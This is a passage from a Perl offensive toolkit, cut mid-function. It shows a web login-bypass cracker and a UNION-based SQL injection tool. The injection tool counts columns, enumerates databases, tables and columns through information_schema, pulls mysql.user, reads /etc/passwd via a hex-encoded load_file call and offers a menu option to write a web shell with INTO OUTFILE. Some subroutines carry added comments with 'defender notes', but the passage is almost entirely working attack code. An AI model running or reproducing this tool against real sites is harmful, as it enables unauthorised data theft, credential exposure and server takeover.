3309 | printear( "\n[+] Cracking login....\n", "text", "13", "5" ); | |
3310 | for my $by (@bypass) { | |
3311 | chomp $by; | |
3312 | my $code = load_nownow( $url, $code, $op, $aca, $by ); | |
3313 | if ( $code =~ /$st/ig ) { | |
3314 | cracked( $url, $by ); | |
3315 | } | |
3316 | } | |
3317 | adios(); | |
3318 | } | |
3319 | ||
3320 | if ( $op2 eq "2" ) { | |
3321 | my $st = printear( "\n[+] String : ", "stdin", "11", "13" ); | |
3322 | printear( "\n[+] Cracking login....\n", "text", "13", "5" ); | |
3323 | for my $by (@bypass) { | |
3324 | chomp $by; | |
3325 | my $code = load_nownow( $url, $code, $op, $aca, $by ); | |
3326 | unless ( $code =~ /$st/ig ) { | |
3327 | cracked( $url, $by ); | |
3328 | } | |
3329 | } | |
3330 | adios(); | |
3331 | } | |
3332 | ||
3333 | if ( $op2 eq "3" ) { | |
3334 | printear( "\n[+] Cracking login....\n", "text", "13", "5" ); | |
3335 | my $prueba_falsa = | |
3336 | load_nownow( $url, $code, $op, $aca, "fuck you" ); | |
3337 | for my $by (@bypass) { | |
3338 | chomp $by; | |
3339 | my $code = load_nownow( $url, $code, $op, $aca, $by ); | |
3340 | unless ( $code eq $prueba_falsa ) { | |
3341 | cracked( $url, $by ); | |
3342 | } | |
3343 | } | |
3344 | adios(); | |
3345 | } | |
3346 | } | |
3347 | ||
3348 | sub load_nownow { | |
3349 | ||
3350 | my ( $url, $code, $op, $aca, $text ) = @_; | |
3351 | ||
3352 | $op--; | |
3353 | my @probar = ( HTML::Form->parse( $code, "/" ) )[$op]; | |
3354 | ||
3355 | for my $testa (@probar) { | |
3356 | if ( $testa->method eq "POST" ) { | |
3357 | ||
3358 | my @inputs = $testa->inputs; | |
3359 | for my $in (@inputs) { | |
3360 | if ( $in->type eq "submit" ) { | |
3361 | if ( $in->name eq $aca ) { | |
3362 | push( @botones_names, $in->name ); | |
3363 | push( @botones_values, $in->value ); | |
3364 | } | |
3365 | } | |
3366 | else { | |
3367 | push( @ordenuno, $in->name, $text ); | |
3368 | } | |
3369 | } | |
3370 | ||
3371 | my @preuno = @ordenuno; | |
3372 | push( @preuno, $botones_names[0], $botones_values[0] ); | |
3373 | my $codeuno = $nave->post( $url, \@preuno )->content; | |
3374 | ||
3375 | return $codeuno; | |
3376 | ||
3377 | } | |
3378 | else { | |
3379 | ||
3380 | my $final = ""; | |
3381 | my $orden = ""; | |
3382 | my $partedos = ""; | |
3383 | ||
3384 | my @inputs = $testa->inputs; | |
3385 | for my $testa (@inputs) { | |
3386 | ||
3387 | if ( $testa->name eq $aca ) { | |
3388 | ||
3389 | push( @botones_names, $testa->name ); | |
3390 | push( @botones_values, $testa->value ); | |
3391 | } | |
3392 | else { | |
3393 | $orden .= '' . $testa->name . '=' . $text . '&'; | |
3394 | } | |
3395 | } | |
3396 | chop($orden); | |
3397 | ||
3398 | my $partedos = | |
3399 | "&" . $botones_names[0] . "=" . $botones_values[0]; | |
3400 | my $final = $url . "?" . $orden . $partedos; | |
3401 | ||
3402 | $codedos = toma($final); | |
3403 | return $codedos; | |
3404 | } | |
3405 | } | |
3406 | } | |
3407 | ||
3408 | sub cracked { | |
3409 | printear( "\n\a\a[+] Login Cracked\n\n", "text", "7", "5" ); | |
3410 | printear( "[+] URL : $_[0]\n", "text", "7", "5" ); | |
3411 | printear( "[+] Bypass : $_[1]\n", "text", "7", "5" ); | |
3412 | savefile( "logs-bypass.txt", "[+] URL : $_[0]" ); | |
3413 | savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" ); | |
3414 | adios(); | |
3415 | } | |
3416 | ||
3417 | sub head_bypass { | |
3418 | clean(); | |
3419 | printear( " | |
3420 | ||
3421 | @@@@ @@@@@ @ @ @ | |
3422 | @ @ @ @ @ @ | |
3423 | @ @ @ @ @ @ @ | |
3424 | @ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@ | |
3425 | @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ | |
3426 | @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ | |
3427 | @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ | |
3428 | @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3429 | @@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @ | |
3430 | @ | |
3431 | @@ | |
3432 | ||
3433 | ||
3434 | ||
3435 | ", "logos", "7", "5" ); | |
3436 | } | |
3437 | ||
3438 | } ## | |
3439 | ||
3440 | sub load_kobra { | |
3441 | ||
3442 | installer_kobra(); | |
3443 | clean(); | |
3444 | ||
3445 | &head_kobra; | |
3446 | &menu_kobra; | |
3447 | ||
3448 | adios(); | |
3449 | ||
3450 | sub menu_kobra { | |
3451 | my $page = printear( "[Page] : ", "stdin", "11", "13" ); | |
3452 | my $bypass = | |
3453 | printear( "\n[Bypass : -- /* %20] : ", "stdin", "11", "13" ); | |
3454 | print "\n"; | |
3455 | if ( $page eq "exit" ) { | |
3456 | adios(); | |
3457 | } | |
3458 | &scan_kobra( $page, $bypass ); | |
3459 | } | |
3460 | ||
3461 | sub scan_kobra { | |
3462 | my $page = $_[0]; | |
3463 | printear( "[Status] : Scanning.....\n", "text", "13", "5" ); | |
3464 | ( $pass1, $bypass2 ) = &bypass( $_[1] ); | |
3465 | ||
3466 | my $save = partimealmedio( $_[0] ); | |
3467 | ||
3468 | if ( $_[0] =~ /hackman/ig ) { | |
3469 | savefilear( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" ); | |
3470 | &menu_options( $_[0], $_[1], $save ); | |
3471 | } | |
3472 | ||
3473 | my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 ); | |
3474 | my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 ); | |
3475 | ||
3476 | unless ( $testar1 eq $testar2 ) { | |
3477 | motor( $page, $_[1] ); | |
3478 | } | |
3479 | else { | |
3480 | printear( "\n[-] Not vulnerable\n\n", "text", "5", "5" ); | |
3481 | my $op = printear( "[+] Scan anyway y/n : ", "stdin", "11", "13" ); | |
3482 | if ( $op eq "y" ) { | |
3483 | motor( $page, $_[1] ); | |
3484 | } | |
3485 | else { | |
3486 | head_kobra(); | |
3487 | menu_kobra(); | |
3488 | } | |
3489 | } | |
3490 | ||
3491 | } | |
3492 | ||
3493 | sub motor { | |
3494 | ||
3495 | my ( $gen, $save, $control ) = &length( $_[0], $_[1] ); | |
3496 | ||
3497 | if ( $control eq 1 ) { | |
3498 | printear( "[Status] : Enjoy the menu\n\n", "text", "13", "5" ); | |
3499 | &menu_options( $gen, $_[1], $save ); | |
3500 | } | |
3501 | else { | |
3502 | printear( "[Status] : Length columns not found\n\n", | |
3503 | "text", "5", "5" ); | |
3504 | <STDIN>; | |
3505 | &head_kobra; | |
3506 | &menu_kobra; | |
3507 | } | |
3508 | } | |
3509 | ||
3510 | sub head_kobra { | |
3511 | clean(); | |
3512 | printear( " | |
3513 | @ @@ @ | |
3514 | @@ @ @ @@ | |
3515 | @ @@ @ @ @ @ @ @ @@@ | |
3516 | @ @ @ @ @@ @ @@@ @ @ | |
3517 | @@ @ @ @ @ @ @@@ | |
3518 | @ @ @ @ @ @ @ @ @ | |
3519 | @@@ @ @@ @@@ @@@ @@@@@ | |
3520 | ||
3521 | ||
3522 | ||
3523 | ||
3524 | ", "logos", "7", "5" ); | |
3525 | } | |
3526 | ||
3527 | sub length { | |
3528 | printear( | |
3529 | "\n[+] Looking for the number of columns\n\n", "text", | |
3530 | "13", "5" | |
3531 | ); | |
3532 | my $rows = "0"; | |
3533 | my $asc; | |
3534 | my $page = $_[0]; | |
3535 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
3536 | ||
3537 | $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")"; | |
3538 | $total = "1"; | |
3539 | for my $rows ( 2 .. 200 ) { | |
3540 | $asc .= "," . "char(" | |
3541 | . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")"; | |
3542 | $total .= "," . $rows; | |
3543 | $injection = | |
3544 | $page . "1" | |
3545 | . $pass1 . "and" | |
3546 | . $pass1 . "1=0" | |
3547 | . $pass1 . "union" | |
3548 | . $pass1 | |
3549 | . "select" | |
3550 | . $pass1 | |
3551 | . $alert | |
3552 | . $asc; | |
3553 | $test = toma($injection); | |
3554 | if ( $test =~ /RATSXPDOWN/ ) { | |
3555 | @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g; | |
3556 | $control = 1; | |
3557 | ||
3558 | my $save = partimealmedio( $_[0] ); | |
3559 | ||
3560 | savefilear( $save . ".txt", "\n[Target confirmed] : $page" ); | |
3561 | savefilear( $save . ".txt", "[Bypass] : $_[1]\n" ); | |
3562 | savefilear( $save . ".txt", | |
3563 | "[Limit] : The site has $rows columns" ); | |
3564 | savefilear( $save . ".txt", | |
3565 | "[Data] : The number @number print data" ); | |
3566 | $total =~ s/$number[0]/hackman/; | |
3567 | savefilear( | |
3568 | $save . ".txt", | |
3569 | "[SQLI] : " | |
3570 | . $page . "1" | |
3571 | . $pass1 . "and" | |
3572 | . $pass1 . "1=0" | |
3573 | . $pass1 . "union" | |
3574 | . $pass1 | |
3575 | . "select" | |
3576 | . $pass1 | |
3577 | . $total | |
3578 | ); | |
3579 | return ( | |
3580 | $page . "1" | |
3581 | . $pass1 . "and" | |
3582 | . $pass1 . "1=0" | |
3583 | . $pass1 . "union" | |
3584 | . $pass1 | |
3585 | . "select" | |
3586 | . $pass1 | |
3587 | . $total, | |
3588 | $save, $control | |
3589 | ); | |
3590 | } | |
3591 | } | |
3592 | } | |
3593 | ||
3594 | sub details { | |
3595 | my ( $page, $bypass, $save ) = @_; | |
3596 | ( $pass1, $pass2 ) = &bypass($bypass); | |
3597 | savefilear( $save . ".txt", "\n" ); | |
3598 | if ( $page =~ /(.*)hackman(.*)/ig ) { | |
3599 | printear( "[+] Searching information..\n\n", "text", "13", "5" ); | |
3600 | my ( $start, $end ) = ( $1, $2 ); | |
3601 | $inforschema = | |
3602 | $start | |
3603 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" | |
3604 | . $end | |
3605 | . $pass1 . "from" | |
3606 | . $pass1 | |
3607 | . "information_schema.tables" | |
3608 | . $pass2; | |
3609 | $mysqluser = | |
3610 | $start | |
3611 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" | |
3612 | . $end | |
3613 | . $pass1 . "from" | |
3614 | . $pass1 | |
3615 | . "mysql.user" | |
3616 | . $pass2; | |
3617 | $test3 = | |
3618 | toma( $start | |
3619 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" | |
3620 | . $end | |
3621 | . $pass2 ); | |
3622 | $test1 = toma($inforschema); | |
3623 | $test2 = toma($mysqluser); | |
3624 | if ( $test2 =~ /ERTOR854/ig ) { | |
3625 | savefilear( $save . ".txt", "[mysql.user] : ON" ); | |
3626 | printear( "[mysql.user] : ON\n", "text", "7", "5" ); | |
3627 | } | |
3628 | else { | |
3629 | printear( "[mysql.user] : OFF\n", "text", "5", "5" ); | |
3630 | savefilear( $save . ".txt", "[mysql.user] : OFF" ); | |
3631 | } | |
3632 | if ( $test1 =~ /ERTOR854/ig ) { | |
3633 | printear( "[information_schema.tables] : ON\n", | |
3634 | "text", "7", "5" ); | |
3635 | savefilear( $save . ".txt", | |
3636 | "[information_schema.tables] : ON" ); | |
3637 | } | |
3638 | else { | |
3639 | printear( "[information_schema.tables] : OFF\n", | |
3640 | "text", "5", "5" ); | |
3641 | savefilear( $save . ".txt", | |
3642 | "[information_schema.tables] : OFF" ); | |
3643 | } | |
3644 | if ( $test3 =~ /ERTOR854/ig ) { | |
3645 | printear( "[load_file] : ON\n", "text", "7", "5" ); | |
3646 | savefilear( | |
3647 | $save . ".txt", | |
3648 | "[load_file] : " | |
3649 | . $start | |
3650 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" | |
3651 | . $end | |
3652 | . $pass2 | |
3653 | ); | |
3654 | } | |
3655 | $concat = | |
3656 | "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; | |
3657 | $injection = $start . $concat . $end . $pass2; | |
3658 | $code = toma($injection); | |
3659 | if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) { | |
3660 | printear( | |
3661 | "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n\n", | |
3662 | "text", "7", "5" | |
3663 | ); | |
3664 | savefilear( | |
3665 | $save . ".txt", | |
3666 | "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n" | |
3667 | ); | |
3668 | } | |
3669 | else { | |
3670 | printear( "\n[-] Not found any data\n", "text", "5", "5" ); | |
3671 | } | |
3672 | } | |
3673 | } | |
3674 | ||
3675 | sub menu_options { | |
3676 | ||
3677 | my $testarnownow = $_[0]; ## Comment on this line to compile to exe | |
3678 | $SIG{INT} = | |
3679 | sub { reload($testarnownow) }; ## Comment on this line to compile to exe | |
3680 | ||
3681 | head_kobra(); | |
3682 | ||
3683 | printear( "[Target confirmed] : $_[0]\n", "text", "11", "5" ); | |
3684 | printear( "[Bypass] : $_[1]\n\n", "text", "11", "5" ); | |
3685 | ||
3686 | my $save = partimealmedio( $_[0] ); | |
3687 | ||
3688 | printear( "[save] : /logs/webs/$save\n\n", "text", "11", "5" ); | |
3689 | ||
3690 | printear( "\n--== information_schema.tables ==--\n\n", | |
3691 | "logos", "5", "5" ); | |
3692 | printear( "[1] : Show tables\n", "logos", "13", "5" ); | |
3693 | printear( "[2] : Show columns\n", "logos", "13", "5" ); | |
3694 | printear( "[3] : Show DBS\n", "logos", "13", "5" ); | |
3695 | printear( "[4] : Show tables with other DB\n", "logos", "13", "5" ); | |
3696 | printear( "[5] : Show columns with other DB", "logos", "13", "5" ); | |
3697 | printear( "\n\n--== mysql.user ==--\n\n", "logos", "5", "5" ); | |
3698 | printear( "[6] : Show users\n", "logos", "13", "5" ); | |
3699 | printear( "\n--== Others ==--\n\n", "logos", "5", "5" ); | |
3700 | printear( "[7] : Fuzz tables\n", "logos", "13", "5" ); | |
3701 | printear( "[8] : Fuzz Columns\n", "logos", "13", "5" ); | |
3702 | printear( "[9] : Fuzzing files with load_file\n", "logos", "13", "5" ); | |
3703 | printear( "[10] : Read a file with load_file\n", "logos", "13", "5" ); | |
3704 | printear( "[11] : Dump\n", "logos", "13", "5" ); | |
3705 | printear( "[12] : Informacion of the server\n", "logos", "13", "5" ); | |
3706 | printear( "[13] : Create a shell with into outfile\n", | |
3707 | "logos", "13", "5" ); | |
3708 | printear( "[14] : Show Log\n", "logos", "13", "5" ); | |
3709 | printear( "[15] : Change Target\n", "logos", "13", "5" ); | |
3710 | printear( "[16] : Exit\n", "logos", "13", "5" ); | |
3711 | ||
3712 | my $opcion = printear( "\n[Option] : ", "stdin", "11", "13" ); | |
3713 | ||
3714 | if ( $opcion eq "1" ) { | |
3715 | schematables( $_[0], $_[1], $save ); | |
3716 | &reload; | |
3717 | } | |
3718 | elsif ( $opcion eq "2" ) { | |
3719 | my $tabla = printear( "\n[Table] : ", "stdin", "11", "13" ); | |
3720 | schemacolumns( $_[0], $_[1], $save, $tabla ); | |
3721 | &reload; | |
3722 | } | |
3723 | elsif ( $opcion eq "3" ) { | |
3724 | &schemadb( $_[0], $_[1], $save ); | |
3725 | &reload; | |
3726 | } | |
3727 | elsif ( $opcion eq "4" ) { | |
3728 | my $data = printear( "\n[Database] : ", "stdin", "11", "13" ); | |
3729 | &schematablesdb( $_[0], $_[1], $data, $save ); | |
3730 | &reload; | |
3731 | } | |
3732 | elsif ( $opcion eq "5" ) { | |
3733 | my $db = printear( "\n[DB] : ", "stdin", "11", "13" ); | |
3734 | my $table = printear( "\n[Table] : ", "stdin", "11", "13" ); | |
3735 | &schemacolumnsdb( $_[0], $_[1], $db, $table, $save ); | |
3736 | &reload; | |
3737 | } | |
3738 | elsif ( $opcion eq "6" ) { | |
3739 | &mysqluser( $_[0], $_[1], $save ); | |
3740 | &reload; | |
3741 | } | |
3742 | elsif ( $opcion eq "7" ) { ## | |
3743 | &fuzz( $_[0], $_[1], $save ); | |
3744 | &reload; | |
3745 | } | |
3746 | elsif ( $opcion eq "8" ) { ## | |
3747 | my $table = printear( "\n[Table] : ", "stdin", "11", "13" ); | |
3748 | &fuzzcol( $_[0], $_[1], $table, $save ); | |
3749 | &reload; | |
3750 | } | |
3751 | elsif ( $opcion eq "9" ) { | |
3752 | &load( $_[0], $_[1], $save ); | |
3753 | &reload; | |
3754 | } | |
3755 | elsif ( $opcion eq "10" ) { | |
3756 | &loadfile( $_[0], $_[1], $save ); | |
3757 | &reload; | |
3758 | } | |
3759 | elsif ( $opcion eq "11" ) { | |
3760 | my $tabla = printear( "\n[Table to dump] : ", "stdin", "11", "13" ); | |
3761 | my $col1 = printear( "\n[Column 1] : ", "stdin", "11", "13" ); | |
3762 | my $col2 = printear( "\n[Column 2] : ", "stdin", "11", "13" ); | |
3763 | print "\n\n"; | |
3764 | &dump( $_[0], $col1, $col2, $tabla, $_[1], $save ); | |
3765 | &reload; | |
3766 | } | |
3767 | elsif ( $opcion eq "12" ) { | |
3768 | print "\n"; | |
3769 | &details( $_[0], $_[1], $save ); | |
3770 | &reload; | |
3771 | } | |
3772 | elsif ( $opcion eq "13" ) { | |
3773 | my $path = | |
3774 | printear( "\n[Full Path Discloure] : ", "stdin", "11", "13" ); | |
3775 | &into( $_[0], $_[1], $path, $save ); | |
3776 | &reload; | |
3777 | } | |
3778 | elsif ( $opcion eq "14" ) { | |
3779 | $t = "logs/webs/$save.txt"; | |
3780 | system_leida($t); | |
3781 | &reload; | |
3782 | } | |
3783 | elsif ( $opcion eq "15" ) { | |
3784 | &head_kobra; | |
3785 | &menu_kobra; | |
3786 | } | |
3787 | ||
3788 | elsif ( $opcion eq "16" ) { | |
3789 | adios(); | |
3790 | } | |
3791 | else { | |
3792 | &reload; | |
3793 | } | |
3794 | } | |
3795 | ||
3796 | sub schematables { | |
3797 | ||
3798 | $real = "1"; | |
3799 | my ( $page, $bypass, $save ) = @_; | |
3800 | savefilear( $save . ".txt", "\n" ); | |
3801 | ||
3802 | my $page1 = $page; | |
3803 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
3804 | savefilear( $save . ".txt", "[DB] : Default" ); | |
3805 | printear( "\n[+] Searching tables with schema\n\n", "text", "13", "5" ); | |
3806 | $page =~ | |
3807 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3808 | $page1 =~ | |
3809 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3810 | $code = | |
3811 | toma( $page1 | |
3812 | . $pass1 . "from" | |
3813 | . $pass1 | |
3814 | . "information_schema.tables" | |
3815 | . $pass2 ); | |
3816 | ||
3817 | if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3818 | my $resto = $1; | |
3819 | $total = $resto - 17; | |
3820 | printear( "[+] Tables Length : $total\n\n", "text", "13", "5" ); | |
3821 | savefilear( $save . ".txt", "[+] Searching tables with schema\n" ); | |
3822 | savefilear( $save . ".txt", "[+] Tables Length : $total\n" ); | |
3823 | my $limit = $1; | |
3824 | for my $limit ( 17 .. $limit ) { | |
3825 | $code1 = | |
3826 | toma( $page | |
3827 | . $pass1 . "from" | |
3828 | . $pass1 | |
3829 | . "information_schema.tables" | |
3830 | . $pass1 . "limit" | |
3831 | . $pass1 | |
3832 | . $limit . ",1" | |
3833 | . $pass2 ); | |
3834 | ||
3835 | #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2."\n"; | |
3836 | if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3837 | my $table = $1; | |
3838 | chomp $table; | |
3839 | printear( "[Table $real Found : $table ]\n", | |
3840 | "text", "7", "5" ); | |
3841 | savefilear( $save . ".txt", | |
3842 | "[Table $real Found : $table ]" ); | |
3843 | $real++; | |
3844 | } | |
3845 | } | |
3846 | } | |
3847 | else { | |
3848 | printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" ); | |
3849 | } | |
3850 | } | |
3851 | ||
3852 | sub reload { | |
3853 | printear( "\n[+] Press the enter key to return to main menu\n", | |
3854 | "text", "11", "5" ); | |
3855 | <STDIN>; | |
3856 | &head_kobra; | |
3857 | &menu_options; | |
3858 | } | |
3859 | ||
# List the column names of $table via information_schema.columns, printing
# each one and appending it to "$save.txt".
#
# Parameters:
#   $page   - URL containing the literal placeholder "hackman", which is
#             replaced by the SQL expression to be reflected in the response
#   $bypass - passed to bypass(); the two strings it returns are used as the
#             separator between SQL tokens ($pass1) and the request suffix
#             ($pass2)
#   $save   - base name of the results file (".txt" is appended)
#   $table  - table name; sent as char(...) built by ascii() (defined
#             elsewhere, presumably comma-separated character codes)
#
# $pass1, $pass2, $code3, $code4 and $real are assigned without `my`, so
# they are package globals shared with the sibling subs.
#
# Defender note: each request carries `information_schema.columns`,
# `table_name=char(` and the marker RATSXPDOWN1 spelled as
# char(82,65,84,83,88,80,68,79,87,78,49). Those strings in web-server or WAF
# logs indicate UNION-based schema enumeration; parameterized queries remove
# the injection point this relies on.
sub schemacolumns {
    my ( $page, $bypass, $save, $table ) = @_;
    my $page3 = $page;
    my $page4 = $page;
    savefilear( $save . ".txt", "\n" );
    ( $pass1, $pass2 ) = &bypass($bypass);
    printear( "\n[DB] : Default\n", "text", "13", "5" );
    savefilear( $save . ".txt", "[DB] : Default" );
    savefilear( $save . ".txt", "[Table] : $table\n" );

    # First request: Count(*) wrapped in the marker, to learn how many
    # columns the table has.
    $page3 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 =
      toma( $page3
          . $pass1 . "from"
          . $pass1
          . "information_schema.columns"
          . $pass1 . "where"
          . $pass1
          . "table_name=char("
          . ascii($table) . ")"
          . $pass2 );

    if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        printear( "\n[Columns Length : $1 ]\n\n", "text", "13", "5" );
        savefilear( $save . ".txt", "[Columns Length : $1 ]\n" );
        my $si = $1;
        chomp $si;
        $page4 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";    # 1-based counter used only in the output lines

        # One request per row using `limit N,1`. The range 0 .. $si is
        # inclusive, so one request more than the reported count is sent.
        for my $limit2 ( 0 .. $si ) {
            $code4 =
              toma( $page4
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.columns"
                  . $pass1 . "where"
                  . $pass1
                  . "table_name=char("
                  . ascii($table) . ")"
                  . $pass1 . "limit"
                  . $pass1
                  . $limit2 . ",1"
                  . $pass2 );
            if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                printear( "[Column $real] : $1\n", "text", "7", "5" );
                savefilear( $save . ".txt", "[Column $real] : $1" );
                $real++;
            }
        }
    }
    else {
        # No marker in the response: the count query was not reflected.
        printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
    }
}
3915 | ||
# List database (schema) names via information_schema.schemata, printing
# each one and appending it to "$save.txt".
#
# Parameters:
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - passed to bypass(), whose two return values become the token
#             separator ($pass1) and the request suffix ($pass2)
#   $save   - base name of the results file (".txt" is appended)
#
# $pass1, $pass2, $code and $real are package globals (no `my`).
#
# Defender note: requests contain `information_schema.schemata` together
# with the RATSXPDOWN1 marker written as char(...) codes; an application
# account that cannot read other schemas limits what this returns.
sub schemadb {
    my ( $page, $bypass, $save ) = @_;
    my $page1 = $page;
    savefilear( $save . ".txt", "\n" );
    printear( "\n[+] Searching DBS\n\n", "text", "13", "5" );
    ( $pass1, $pass2 ) = &bypass($bypass);
    $page =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;

    # Count query. Unlike the per-row requests below, $pass2 is not
    # appended here.
    $code = toma(
        $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
    if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        my $limita = $1;
        printear( "[+] Databases Length : $limita\n\n", "text", "13", "5" );
        savefilear( $save . ".txt", "[+] Databases Length : $limita\n" );
        $page1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";

        # 0 .. $limita is inclusive: one request more than the count.
        for my $limit ( 0 .. $limita ) {
            $code =
              toma( $page1
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.schemata"
                  . $pass1 . "limit"
                  . $pass1
                  . $limit . ",1"
                  . $pass2 );
            if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                my $control = $1;

                # These three names are skipped and never reported.
                if (    $control ne "information_schema"
                    and $control ne "mysql"
                    and $control ne "phpmyadmin" )
                {
                    printear(
                        "[Database $real Found] $control\n", "text",
                        "7",                                 "5"
                    );
                    savefilear( $save . ".txt",
                        "[Database $real Found] : $control" );
                    $real++;
                }
            }
        }
    }
    else {
        printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
    }
}
3964 | ||
# List the table names of one database via information_schema.tables,
# printing each one and appending it to the results file.
#
# Positional arguments (read straight from @_):
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - selector passed to bypass()
#   $_[2] - database name, sent as char(...) built by ascii()
#   $_[3] - base name of the results file (".txt" is appended)
#
# $pass1, $pass2, $code, $code1 and $real are package globals (no `my`).
#
# Defender note: requests contain `information_schema.tables`,
# `table_schema=char(` and the RATSXPDOWN1 marker as char(...) codes.
sub schematablesdb {
    my $page  = $_[0];
    my $db    = $_[2];
    my $page1 = $page;
    savefilear( $_[3] . ".txt", "\n" );
    printear( "\n[+] Searching tables in DB [$db]\n\n", "text", "13", "5" );
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    savefilear( $_[3] . ".txt", "[DB] : $db" );

    # $page fetches one table_name per request; $page1 fetches the count.
    $page =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code =
      toma( $page1
          . $pass1 . "from"
          . $pass1
          . "information_schema.tables"
          . $pass1 . "where"
          . $pass1
          . "table_schema=char("
          . ascii($db) . ")"
          . $pass2 );

#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        printear( "[+] Tables Length : $1\n\n", "text", "13", "5" );
        savefilear( $_[3] . ".txt", "[+] Tables Length : $1\n" );
        my $limit = $1;
        $real = "1";

        # 0 .. $limit is inclusive: one request more than the count.
        for my $lim ( 0 .. $limit ) {
            $code1 =
              toma( $page
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.tables"
                  . $pass1 . "where"
                  . $pass1
                  . "table_schema=char("
                  . ascii($db) . ")"
                  . $pass1 . "limit"
                  . $pass1
                  . $lim . ",1"
                  . $pass2 );

#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
            if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                my $table = $1;
                chomp $table;
                savefilear( $_[3] . ".txt",
                    "[Table $real Found : $table ]" );
                printear( "[Table $real Found : $table ]\n",
                    "text", "7", "5" );
                $real++;
            }
        }
    }
    else {
        printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
    }
}
4025 | ||
# List the column names of $table inside database $db via
# information_schema.columns, printing each one and appending it to
# "$save.txt".
#
# Parameters:
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - selector for bypass(); note the call below reads $_[1]
#             directly, which is the same value
#   $db     - database name, sent as char(...) built by ascii()
#   $table  - table name, sent the same way
#   $save   - base name of the results file (".txt" is appended)
#
# $pass1, $pass2, $code3, $code4 and $real are package globals (no `my`).
#
# Defender note: requests contain `information_schema.columns` with both a
# `table_name=char(` and a `table_schema=char(` filter, plus the
# RATSXPDOWN1 marker as char(...) codes.
sub schemacolumnsdb {
    my ( $page, $bypass, $db, $table, $save ) = @_;
    my $page3 = $page;
    my $page4 = $page;
    printear( "\n[+] Searching columns in table $table in DB [$db]\n",
        "text", "13", "5" );
    savefilear( $save . ".txt", "\n" );
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    savefilear( $save . ".txt", "\n[DB] : $db" );
    savefilear( $save . ".txt", "[Table] : $table" );

    # Count query first.
    $page3 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 =
      toma( $page3
